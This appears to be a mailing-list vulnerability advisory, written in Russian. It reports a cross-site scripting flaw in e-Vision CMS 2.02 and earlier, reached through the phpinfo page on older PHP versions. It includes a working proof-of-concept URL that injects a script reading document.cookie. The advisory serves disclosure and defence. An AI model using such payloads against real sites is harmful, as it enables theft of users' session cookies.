Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Active Bids

DMXReady Blog Manager (SQL/XSS)

[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1

phpList <= 2.10.8 Local File inclusion

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	16.01.2009
Subject:	Cross-Site Scripting vulnerability in e-Vision CMS

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Cross-Site Scripting уязвимости в системе
e-Vision CMS.

XSS:

http://site/admin/phpinfo.
php?xss[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уязвимы e-Vision CMS 2.02 и предыдущие версии (и потенциально следующие)
на PHP <= 4.4.6 и PHP <= 5.1.2 (где имеется XSS в phpinfo).

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/2796/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua